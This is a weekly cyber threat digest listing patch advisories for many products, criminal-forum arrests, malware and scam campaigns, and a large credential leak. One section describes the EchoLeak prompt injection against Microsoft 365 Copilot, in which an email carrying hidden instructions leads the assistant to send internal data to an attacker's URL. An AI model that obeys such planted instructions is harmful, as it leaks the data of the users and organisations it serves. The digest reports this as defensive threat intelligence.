Weekly Threat Landscape Digest – Week 26

This week’s cyber threat landscape reveals a surge in zero-day exploit activity, advanced phishing schemes, and the active targeting of known but unpatched vulnerabilities across various industries. Adversaries are showing increased sophistication, often blending into legitimate traffic by using open-source tools and trusted services to bypass security controls.
To counter these evolving threats, organizations must prioritize robust patch and vulnerability management, enhance real-time threat detection, and maintain comprehensive visibility across endpoints and network assets. In parallel, strengthening employee cyber awareness, ensuring timely threat intelligence delivery, and rehearsing incident response procedures are essential for minimizing risk and accelerating recovery.
Together, these proactive steps build a stronger, more adaptive defense against modern cyber threats.
- Privilege Escalation Vulnerability in HPE OneView for VMware vCenter (CVE-2025-37101)
A critical local privilege escalation vulnerability has been identified in HPE OneView for VMware vCenter (OV4VC), affecting all versions prior to v11.7. The vulnerability allows a read-only user to gain administrative privileges, potentially compromising the integrity and availability of affected systems in virtualized environments.
Vulnerability Details:
- CVE ID: CVE-2025-37101
- CVSS v3.1 score: 8.7 (High)
- Affected Product: HPE OneView for VMware vCenter with Operations Manager and Log Insight
- Impact: Privilege escalation and execution of unauthorized administrative actions
- Affected Versions: All versions prior to v11.7
- Fixed Version: v11.7 and later
Recommendations:
Organizations are strongly advised to upgrade to version 11.7 or later immediately. Review user permissions and monitor system activity for unusual behavior. Prompt patching is essential to prevent exploitation.
Reference:
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04876en_us&docLocale=en_US
- Security Updates – Mozilla Firefox (CVE-2025-6424, CVE-2025-6425, CVE-2025-6426)
Mozilla has released security updates for Firefox to address multiple high and moderate severity vulnerabilities. These flaws could lead to application crashes, user tracking via a persistent UUID, and lack of warning before executing terminal files on macOS.
Vulnerability Details:
- CVE-2025-6424
- Severity: High
- Description: Use-after-free in FontFaceSet could lead to a potentially exploitable crash.
- CVE-2025-6425
- Severity: Moderate
- Description: The WebCompat extension exposed a persistent UUID, enabling attackers to track browsers across sessions and modes.
- CVE-2025-6426
- Severity: Moderate
- Description: Firefox for macOS failed to warn users before executing terminal files, increasing risk of unintended command execution. Other platforms are unaffected.
Fixed Versions:
- Firefox 140
- Firefox ESR 115.25
- Firefox ESR 128.12
Recommendations:
Users and administrators are strongly advised to upgrade to the latest patched versions of Firefox. Review browser settings for extensions, especially in enterprise environments, and enforce secure update policies.
References:
https://www.mozilla.org/en-US/security/advisories/mfsa2025-51/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-52/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-53/
- Critical Remote Code Execution Vulnerabilities in Cisco Identity Services Engine (CVE-2025-20281, CVE-2025-20282)
Cisco has disclosed two critical unauthenticated remote code execution (RCE) vulnerabilities in Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC). These flaws allow remote attackers to execute arbitrary commands as root without authentication. Both vulnerabilities are rated CVSS 10.0, indicating maximum severity and exploitability.
Vulnerability Details:
- CVE-2025-20281 – Cisco ISE API Unauthenticated Remote Code Execution
- Severity: Critical
- CVSS Score: 10.0
- Affected Versions: ISE and ISE-PIC 3.3 and later
- Impact: Allows unauthenticated attackers to send crafted API requests that result in root-level command execution.
- Cause: Improper input validation in a public API.
- Fixed In:
- ISE 3.3 Patch 6
- ISE 3.4 Patch 2
- CVE-2025-20282 – Cisco ISE API Unauthenticated File Upload & Execution
- Severity: Critical
- CVSS Score: 10.0
- Affected Versions: ISE and ISE-PIC 3.4 only
- Impact: Unauthenticated attackers can upload and execute arbitrary files as root, leading to full system compromise.
- Cause: Lack of validation during file upload via an internal API.
- Fixed In:
- ISE 3.4 Patch 2
Recommendations:
All affected organizations are urged to apply the security patches immediately. No workarounds exist for these vulnerabilities. Ensure systems are updated to the latest patched versions to prevent exploitation.
Reference:
- Actively Exploited Critical Vulnerability in NetScaler ADC (CVE-2025-6543)
Citrix has released urgent security updates for NetScaler ADC and NetScaler Gateway to address a critical memory overflow vulnerability (CVE-2025-6543) that is being actively exploited in the wild. The vulnerability can lead to unintended control flow and Denial of Service (DoS) when NetScaler is configured as a Gateway or AAA virtual server.
Vulnerability Details:
- CVE ID: CVE-2025-6543
- Severity: Critical
- CVSS v4.0 Base Score: 9.2
- Impact: Memory overflow leading to unintended control flow and Denial of Service
- Pre-conditions: NetScaler must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server
- Exploitation Status: Actively exploited in the wild
Affected Versions:
- NetScaler ADC and Gateway 14.1 before 14.1-47.46
- NetScaler ADC and Gateway 13.1 before 13.1-59.19
- NetScaler ADC 13.1-FIPS and NDcPP before 13.1-37.236
Fixed Versions:
- NetScaler ADC and Gateway 14.1-47.46 and later
- NetScaler ADC and Gateway 13.1-59.19 and later
- NetScaler ADC 13.1-FIPS / NDcPP 13.1-37.236 and later (available via support)
Recommendations:
Organizations are advised to upgrade to the fixed versions immediately. If using 13.1-FIPS or NDcPP builds, contact Citrix support for the appropriate patches. Maintain vigilance and monitor for signs of exploitation.
Reference:
https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694788
- Critical Vulnerability in Kibana (CVE-2025-2135)
Elastic has released urgent security updates to address a critical vulnerability in Kibana, identified as CVE-2025-2135. The flaw stems from a Chromium Type Confusion issue that may result in heap corruption when processing specially crafted HTML pages. This vulnerability impacts both self-hosted and Elastic Cloud Kibana instances where PDF or PNG reporting is enabled, and could allow remote code execution within the reporting environment.
Vulnerability Details:
- CVE ID: CVE-2025-2135
- Vulnerability Type: Heap corruption via Chromium Type Confusion
- Impact: Remote Code Execution in the Kibana reporting environment
- Attack Vector: Network
- Privileges Required: Low
- User Interaction: None
- Exploitability: High
- Severity: Critical
Impacted Versions:
- 7.x: Up to and including 7.17.28
- 8.x: 8.0.0–8.17.7 and 8.18.0–8.18.2
- 9.x: 9.0.0–9.0.2
Fixed Versions:
- 7.17.29
- 8.17.8
- 8.18.3
- 9.0.3
Recommendations:
All affected users should upgrade to the latest fixed versions immediately. If upgrading is not possible, apply available mitigations to reduce exposure. Ensure only trusted sources can access reporting features and review access controls.
Reference:
https://discuss.elastic.co/t/kibana-7-17-29-8-17-8-8-18-3-9-0-3-security-update-esa2025-09/379443/1
- Security Updates – TeamViewer Remote Management (CVE-2025-36537)
TeamViewer has released a security update to address a high-severity local privilege escalation vulnerability in its Remote Management (RM) components, affecting both Full Client and Host versions on Windows systems. The flaw, tracked as CVE-2025-36537, arises from incorrect permission assignments that allow a local attacker to delete arbitrary files using SYSTEM privileges, potentially leading to system compromise.
Vulnerability Details:
- CVE ID: CVE-2025-36537
- Severity: High
- CVSS v3.1 score: 7.0 (High)
- CWE: CWE-732 – Incorrect Permission Assignment for Critical Resource
- Exploit Prerequisites: Local access, RM features enabled
- Impact: Arbitrary file deletion as SYSTEM, privilege escalation
- Affected Features: Remote Management (Backup, Monitoring, Patch Management)
- Not Affected: Systems without Remote Management features
- Fixed In: Version 15.67 and above
- Exploit Status: No known exploitation in the wild
Recommendations:
Organizations using TeamViewer Remote Management are strongly advised to upgrade to version 15.67 or later. Disable unused RM features if not required, and audit local user access to prevent misuse of elevated privileges.
Reference:
https://www.teamviewer.com/en-us/resources/trust-center/security-bulletins/tv2025-1002/
- RCE Vulnerability in WinRAR (CVE-2025-6218)
A critical remote code execution (RCE) vulnerability has been disclosed in RARLAB’s WinRAR, the widely used file compression utility for Windows. Tracked as CVE-2025-6218 and rated CVSS 7.8, the flaw stems from a directory traversal issue caused by insufficient validation during archive extraction. An attacker can exploit this by crafting a malicious archive that, when opened by a user, extracts files to arbitrary paths, potentially leading to full system compromise.
Vulnerability Details:
- CVE ID: CVE-2025-6218
- Severity: High
- CVSS v3.1 score: 7.8
- Impact: Remote Code Execution
- Vulnerability Type: Directory Traversal via crafted archive paths
- Affected Versions: WinRAR versions prior to 7.12 Beta 1
- Fixed Version: WinRAR 7.12 Beta 1
Recommendations:
All users and organizations utilizing WinRAR are urged to upgrade to version 7.12 Beta 1 or later immediately. Avoid opening unknown or suspicious archive files, and implement endpoint protection mechanisms to block potentially malicious file extractions.
Reference:
https://www.zerodayinitiative.com/advisories/ZDI-25-409/
- OpenVPN Driver Flaw Lets Attackers Crash Windows Systems (CVE-2025-50054)
A critical vulnerability has been disclosed in the OpenVPN driver for Windows, enabling remote attackers to crash systems by sending specially crafted network packets. Tracked as CVE-2025-50054, this flaw resides in the Windows kernel-mode wintun-based OpenVPN driver and may be exploited in denial-of-service (DoS) scenarios, impacting VPN reliability and enterprise availability.
Vulnerability Details:
- CVE ID: CVE-2025-50054
- Component: OpenVPN for Windows (wintun driver)
- Attack Vector: Remote (network-based)
- Impact: System crash via unauthenticated malicious traffic
- Affected Versions: All Windows OpenVPN versions using the wintun driver prior to 2.7_alpha2
- Fixed Version: OpenVPN 2.7_alpha2 (Released June 19, 2025)
Recommendations:
Although version 2.7_alpha2 is an alpha release and not intended for production, administrators are urged to evaluate the driver-level risk and consider testing or isolating affected deployments. Monitor network activity for unusual traffic and ensure fallback mechanisms are in place to mitigate potential VPN outages.
Reference:
https://openvpn.net/community-downloads/
- Critical Arbitrary Code Execution Vulnerability in IBM WebSphere Application Server (CVE-2025-36038)
A critical remote code execution (RCE) vulnerability has been identified in IBM WebSphere Application Server (WAS), caused by deserialization of untrusted data. This flaw allows remote attackers to execute arbitrary code without user interaction, potentially leading to full system compromise.
Vulnerability Details:
- CVE ID: CVE-2025-36038
- Severity: 9.0 (Critical)
- CWE: CWE-502 – Deserialization of Untrusted Data
- Impact: Remote Code Execution without authentication or user interaction
- Affected Versions:
- IBM WAS 9.0.0.0 – 9.0.5.24
- IBM WAS 8.5.0.0 – 8.5.5.27
- Fixed Versions:
- WAS 9.0: Fix Pack 9.0.5.25+ and interim fix for APAR PH66674
- WAS 8.5: Fix Pack 8.5.5.28+ and interim fix for APAR PH66674
Recommendations:
Organizations using vulnerable versions should upgrade to the latest fix packs and apply the interim fix (PH66674) immediately. There are no available workarounds; patching is the only effective mitigation. Refer to IBM’s support page for version-specific details.
Reference:
https://www.ibm.com/support/pages/node/7237967
- Critical Command Execution Vulnerabilities in IBM QRadar SIEM (CVE-2025-33117, CVE-2025-36050, CVE-2025-33121)
IBM has released a critical security bulletin addressing multiple vulnerabilities in its QRadar Security Information and Event Management (SIEM) platform, affecting versions 7.5 to 7.5.0 UP12 IF01. These vulnerabilities vary in severity and impact, including remote code execution, information disclosure, and denial-of-service risks. The most severe flaw, CVE-2025-33117, allows remote command execution via autoupdate abuse.
Vulnerability Details:
- CVE-2025-33117 – Remote Command Execution via Autoupdate Abuse
- Severity: Critical (CVSS 9.1)
- Impact: Arbitrary code execution through malicious autoupdate packages
- Description: A privileged user can upload a crafted package, which upon processing, results in command execution with elevated privileges.
- CVE-2025-36050 – Log Information Disclosure
- Severity: Medium (CVSS 6.2)
- Impact: Sensitive data exposure
- Description: Local attackers with filesystem access may read QRadar logs containing internal configuration and credentials.
- CVE-2025-33121 – XML External Entity (XXE) Injection
- Severity: High (CVSS 7.1)
- Impact: Information disclosure or denial-of-service via crafted XML
- Description: Improper XML parsing enables attackers to retrieve files or exhaust system memory.
Affected Versions:
- IBM QRadar SIEM 7.5 to 7.5.0 UP12 IF01
Fixed Version:
- IBM QRadar SIEM 7.5.0 UP12 IF02
Recommendations:
- Upgrade to version 7.5.0 UP12 IF02 immediately.
- Audit and restrict privileged user access.
- Monitor autoupdate activity and disable auto-updates if not required.
Reference:
IBM Advisory
- Critical Remote Code Execution Vulnerability in Mattermost (CVE-2025-4981)
A critical vulnerability has been discovered in Mattermost, the popular open-source team collaboration platform, affecting multiple versions and exposing enterprise environments to high-risk exploitation. The vulnerability, CVE-2025-4981, enables authenticated users to perform path traversal attacks by uploading malicious archive files, potentially leading to remote code execution (RCE) and privilege escalation.
Vulnerability Details:
- CVE ID: CVE-2025-4981
- CVSS Score: 9.9 (Critical)
- Vulnerability Type: Path Traversal → Arbitrary File Write → Remote Code Execution
- Attack Vector: Authenticated file upload (e.g., .zip, .tar.gz)
- Impact: Remote Code Execution, File System Compromise, Privilege Escalation
- Exploitable By: Any authenticated user with file upload permissions
Affected Versions:
- 10.5.x ≤ 10.5.5
- 9.11.x ≤ 9.11.15
- 10.8.x ≤ 10.8.0
- 10.7.x ≤ 10.7.2
- 10.6.x ≤ 10.6.5
Fixed Versions:
- 10.9.0
- 10.8.1
- 10.7.3
- 10.6.6
- 10.5.6
- 9.11.16
Recommendations:
- Upgrade Immediately: All Mattermost users should upgrade to the latest patched versions.
- Audit Upload Permissions: Limit archive upload privileges to trusted users only.
- Monitor System Logs: Review logs for unusual file extractions or write attempts outside expected directories.
Reference:
Mattermost Security Advisory
- Critical Authentication Bypass Vulnerability in Teleport (CVE-2025-49825)
A critical security vulnerability (CVE-2025-49825) has been discovered in Teleport, an open-source platform used to manage secure access to servers, cloud applications, and infrastructure. This flaw allows remote attackers to bypass SSH authentication controls, posing a serious threat to enterprise environments using Teleport in both self-hosted and cloud-based deployments.
Vulnerability Details:
- CVE ID: CVE-2025-49825
- Severity: Critical (CVSS 9.8)
- Impact: Remote SSH Authentication Bypass
- Attack Vector: Remote (via SSH, Git Proxy, Kubernetes integration)
- Exploit Status: No known public exploit; no active exploitation reported
Affected Versions (Teleport Community Edition):
- Versions prior to 17.5.2
- Versions prior to 16.5.12
- Versions prior to 15.5.3
- Versions prior to 14.4.1
- Versions prior to 13.4.27
- Versions prior to 12.4.35
Fixed Versions:
- 17.5.2
- 16.5.12
- 15.5.3
- 14.4.1
- 13.4.27
- 12.4.35
Recommendations:
- Upgrade Immediately: All organizations using vulnerable versions of Teleport should upgrade to the patched versions listed above.
- Audit SSH and Git Access Logs: Review authentication logs for any anomalies or unauthorized access attempts.
- Restrict External Access: Limit SSH and Git proxy exposure to trusted IP ranges until patching is complete.
Reference:
Teleport GitHub Security Advisory
- Critical Vulnerabilities in ControlID iDSecure Software (CVE-2025-49851, CVE-2025-49852, CVE-2025-49853)
Multiple critical vulnerabilities have been identified in ControlID’s iDSecure On-Premises software, which is widely used for vehicle and physical access control. These vulnerabilities enable attackers to gain unauthorized access, exploit internal resources, and manipulate backend databases, all without requiring user interaction.
Vulnerability Details:
- CVE-2025-49851 – Improper Authentication
- Description: Authentication bypass allowing unauthorized access and potential privilege escalation.
- CVSS v4 Score: 8.7
- Impact: Unauthorized system access.
- CVE-2025-49852 – Server-Side Request Forgery (SSRF)
- Description: Allows attackers to craft HTTP requests that interact with internal systems and services.
- CVSS v4 Score: 8.7
- Impact: Internal information disclosure.
- CVE-2025-49853 – SQL Injection
- Description: Vulnerability enabling attackers to execute arbitrary SQL queries, resulting in potential data leakage or modification.
- CVSS v4 Score: 9.3
- Impact: Arbitrary data manipulation and leakage.
Affected Versions:
- iDSecure On-Premises versions 4.7.48.0 and earlier
Fixed Version:
- iDSecure On-Premises version 4.7.50.0
Recommendations:
- Upgrade Immediately: Organizations using affected versions should upgrade to version 4.7.50.0 or later.
- Audit Access Logs: Review logs for unauthorized access or abnormal queries.
- Restrict External Access: Implement network segmentation and firewall controls to minimize exposure.
Reference:
https://www.controlid.com.br/en/access-control/idsecure/
- High-Severity Vulnerabilities in NVIDIA Megatron-LM (CVE-2025-23264, CVE-2025-23265)
NVIDIA has released a security update for its Megatron-LM framework to address multiple high-severity vulnerabilities that affect all platforms. These vulnerabilities allow attackers to inject code via malicious files, potentially leading to arbitrary code execution, privilege escalation, data tampering, and information disclosure.
Vulnerability Details:
- CVE IDs: CVE-2025-23264, CVE-2025-23265
- CVSS Score: 7.8 (High)
- Component: Python-based file parsing
- Impact:
- Code Execution
- Privilege Escalation
- Information Disclosure
- Data Tampering
Affected Platforms:
- All platforms running vulnerable versions of NVIDIA Megatron-LM
Affected Versions:
- All versions prior to 0.12.0
Fixed Version:
- Version 0.12.1
Recommendations:
- Update Immediately: All organizations using Megatron-LM should upgrade to version 0.12.1 or later.
- Audit Python Environments: Review file permissions and scan for any unexpected scripts or payloads.
- Restrict File Uploads: Apply input sanitization and validation to reduce the attack surface.
Reference:
https://nvidia.custhelp.com/app/answers/detail/a_id/5663
- Critical Remote Code Execution Vulnerability in Convoy (CVE-2025-52562)
A critical vulnerability has been discovered in Convoy, a widely adopted KVM server management panel used by hosting providers. Tracked as CVE-2025-52562, the flaw allows unauthenticated remote code execution (RCE) through specially crafted HTTP requests. The root cause is tied to improper sanitization in the LocaleController, enabling directory traversal and unsafe PHP file inclusion.
Vulnerability Details:
- CVE ID: CVE-2025-52562
- CVSS Score: 10.0 (Critical)
- Component: LocaleController
- Impact:
- Unauthenticated Remote Code Execution
- Full system compromise
- Data theft and manipulation
- Attack Vector: Remote (via HTTP using locale/namespace parameters)
- Root Cause: Directory traversal and unsafe file inclusion
Affected Product:
- Convoy KVM Server Management Panel
Affected Versions:
- 3.9.0-rc.3 through 4.4.0
Fixed Version:
- Version 4.4.1 and later
Exploit Status:
- No public exploit disclosed
- Proof-of-concept likely feasible
Recommendations:
- Upgrade Immediately: Apply the patch by upgrading to version 4.4.1 or later.
- Restrict External Access: Until patched, consider limiting access to Convoy admin interfaces using firewalls or VPNs.
- Monitor Logs: Look for suspicious HTTP requests containing unexpected locale or namespace parameters.
Reference:
https://github.com/ConvoyPanel/panel/security/advisories/GHSA-43g3-qpwq-hfgg
- Zero-Click Prompt Injection Vulnerability in Microsoft 365 Copilot (CVE-2025-32711 – EchoLeak)
A critical zero-click prompt injection vulnerability, tracked as CVE-2025-32711 and dubbed EchoLeak, has been identified in Microsoft 365 Copilot, marking the first confirmed breach of its kind. With a CVSS score of 9.3, this vulnerability allows attackers to extract internal organizational data without user interaction. The exploit involves sending a benign-looking email or calendar invite embedded with markdown-based prompt injection. Copilot automatically ingests such content as contextual input and—without any user action—appends internal data to an attacker-controlled URL during its normal response behavior.
This issue highlights a fundamental flaw in AI assistant architecture, where inputs from trusted sources (e.g., inboxes or calendars) are not contextually sandboxed. The attack flow is entirely passive, invisible to users and SOC monitoring tools, and relies on Copilot behaving exactly as designed. Unlike traditional phishing or malware campaigns, this vulnerability exploits the AI’s contextual blending of safe and hostile data without triggering alerts.
Key implications include the need for organizations to:
- Treat prompt ingestion as a security boundary.
- Segment context inputs (emails, chats, documents) to prevent cross-contamination.
- Monitor AI assistant outputs as outbound traffic.
- Demand transparency from AI vendors regarding trigger conditions and data visibility.
Reference:
LinkedIn – Maria Luisa Redondo on CVE-2025-32711 (EchoLeak)
- Arrest of BreachForums v2 Operators in France
On June 24, 2025, French authorities arrested five individuals allegedly involved in operating BreachForums v2, a notorious cybercrime marketplace used for trading stolen data and unauthorized access to corporate networks. The arrests, carried out by the BL2C cybercrime unit of the Paris police, occurred during coordinated raids in Hauts-de-Seine (Paris), Seine-Maritime (Normandy), and Réunion (Overseas).
The following individuals were reportedly apprehended:
- ShinyHunters (Admin/Owner)
- IntelBroker (Admin/Owner – previously arrested in February 2025)
- Hollow (Moderator)
- Noct
- Depressed
BreachForums v2 emerged after the takedown of the original BreachForums in 2023, which followed the arrest of Pompompurin (Conor Brian FitzPatrick). The new iteration quickly gained popularity within the underground cybercrime community and was associated with high-profile data breaches targeting both public and private sector entities.
Key incidents linked to the arrested threat actors include:
- France Travail: Breach compromising data of 43 million individuals
- French entities: SFR, Boulanger, French Football Federation
- Global targets (IntelBroker): Europol, DC Health Link, AMD, Cisco, Nokia, GE, Weee!
- Major corporations (ShinyHunters): Salesforce, Snowflake attacks (impacting Santander, Ticketmaster, AT&T, and more)
The forum was reportedly taken offline in April 2025 following a MyBB zero-day breach and has not resurfaced since.
This significant disruption to a major cybercrime infrastructure may temporarily impact data trading and breach-as-a-service operations on the dark web. However, copycat platforms or successors may attempt to fill the void.
- Modular Malware Framework Leveraging Rogue WordPress Plugin for Skimming and Credential Theft
The Wordfence Threat Intelligence Team uncovered a sophisticated and modular malware family during a site cleanup on May 16, 2025. This malware campaign, ongoing since at least September 2023, consists of over 20 variants sharing a common codebase. These variants include capabilities for credit card skimming, WordPress credential theft, malvertising, and custom payload delivery, with some even hosting live attacker backends directly on infected WordPress sites.
Key Capabilities and Techniques
- Modular Design: All samples shared identical obfuscation methods and anti-analysis features like console rebinding and developer tools detection. Certain versions used infinite loops and debugger traps to evade reverse engineering.
- Targeted Execution: Malware avoids executing on admin panels, and selectively operates on checkout pages. Some variants include lists of disallowed emails/domains to avoid detection.
- Form Manipulation & Skimming: Used HTML injection, overlays, and formjacking with Base64-encoded fake payment forms. Skimmed data is exfiltrated via Base64-encoded strings appended to attacker-controlled URLs.
- Stealth & Persistence: Leveraged localStorage for persistence and employed realistic fake elements like human verification screens mimicking Cloudflare.
- User Profiling: Gathered device/browser metadata, categorized traffic sources, and avoided bots to enhance profiling for malvertising.
- Dynamic Link Replacement: Infected sites replaced legitimate links with malicious ones to further propagate malware.
Rogue WordPress Plugin
One variant masqueraded as a WordPress plugin named “WordPress Core,” with empty scaffolding files and a malicious wordpress-core-public.js skimmer targeting WooCommerce checkout fields. Backend functionality was embedded in PHP files, notably:
- register-messages-posttype.php: Created backend infrastructure for data collection.
- wordpress-core.php: Manipulated WooCommerce orders via hooks (woocommerce_thankyou, wp_footer) to complete fraudulent transactions silently.
This hybrid use of JavaScript and PHP within a plugin represents an evolution in web-based malware delivery and stealth.
Reference:
https://www.wordfence.com/blog/2025/06/a-deep-dive-into-a-modular-malware-family
- Fake Tech Support Numbers Injected into Legitimate Websites via Search Parameter Exploit
Security researchers at Malwarebytes have uncovered a deceptive campaign where scammers inject fake tech support phone numbers into legitimate websites by exploiting a vulnerability known as search parameter injection (or reflected input vulnerability). This method manipulates the URL of an official site to display attacker-controlled content — primarily fraudulent phone numbers — while still showing the legitimate domain in the browser.
Key Attack Mechanics
- Search Parameter Injection: Attackers embed malicious input in the query parameters of URLs, altering visible page elements like support contact numbers.
- Legitimate Website Display: Even though the site appears authentic (e.g., Apple, PayPal, Netflix), the phone number may be replaced with a scammer’s contact.
- Google Ads Abuse: Scammers purchase Google Ads to display manipulated links in search results, often appearing above real links.
- No Website Compromise: The actual websites are not hacked; the scam relies on reflected input vulnerabilities and open search parameters.
Threat Behavior
- Users clicking on a malicious ad are redirected to a legitimate page, but with URL parameters that alter visible content (e.g., ?support=+1-800-XXX-XXXX).
- Victims who call the fake number are subjected to social engineering, where scammers:
- Impersonate legitimate support agents
- Steal personal and financial information
- Request remote access to devices
- Attempt extortion or malware installation
Researcher Recommendations
Malwarebytes advises users to:
- Manually navigate to a company’s official domain instead of trusting ad links (e.g., visit www.apple.com directly).
- Avoid calling numbers embedded in the URL, especially if prompted to “Call Now” or similar high-pressure language.
- Inspect URLs for suspicious encodings like %20 (space) or %2B (‘+’).
- Use official support portals, not search engine results for support numbers.
- Beware of unsolicited support popups or unexpected redirects from search ads.
- Record-Breaking 16 Billion Passwords Exposed in Infostealer-Powered Mega Breach
Key Highlights
- Largest breach in history: Over 16 billion login credentials leaked, spanning social, financial, corporate, and developer platforms.
- Not old data: Many records are recent and not recycled, posing immediate risk.
- Data origin: Likely extracted from infostealer malware such as RedLine, Raccoon, Vidar, etc.
- Affected platforms include: Facebook, Google, Apple, GitHub, Telegram, Zoom, Twitch, and more.
- Data format: Typical entries included URL + login + password, aligned with infostealer data structures.
Threat Impact
- Highly weaponizable: Includes cookies, tokens, and session data capable of bypassing 2FA.
- Real-world consequences: Facilitates phishing, account takeover, business email compromise (BEC), ransomware attacks, and digital identity theft.
- Broad scope: Estimated two leaked credentials per person globally; includes government platforms and internal business tools.
Where Was the Data Found?
- Sources: Publicly exposed Elasticsearch instances, unsecured object storage.
- Collection method: Some logs labeled with malware names or geolocation hints (e.g., “Telegram,” “Russian Federation”).
- Largest dataset: Over 3.5 billion records tied to Portuguese-speaking users.
Reference:
Cybernews Full Report – 16 Billion Passwords Exposed